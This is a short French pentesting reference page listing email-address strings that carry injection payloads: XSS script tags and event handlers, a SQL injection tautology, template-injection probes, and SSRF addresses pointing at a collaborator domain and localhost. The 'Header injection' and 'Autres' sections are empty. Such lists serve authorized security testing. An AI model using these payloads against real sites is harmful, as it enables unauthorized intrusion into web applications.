For the complete documentation index, see llms.txt. This page is also available as Markdown.

💌Injections dans emails

XSS

test+(<script>alert(document.domain)</script>)@mail.xyz
test@mail(<script>alert(document.domain)</script>).xyz
"<script>alert(document.domain)</script>"@mail.xyz
"hello<form/><!><details/open/ontoggle=alert(1)>"@mail.xyz
["');alert('XSS');//"]@mail.xyz

SQLi

"'OR 1=1--'"@mail.xyz

SSTI

"<%=7*7 %>"@mail.xyz
test+(${{7*7}})@mail.xyz
test+${{7*7}}@mail.xyz

SSRF

test@mail.xyz.burpcollab.net
test@[127.0.0.1]

Header injection

Autres

Mis à jour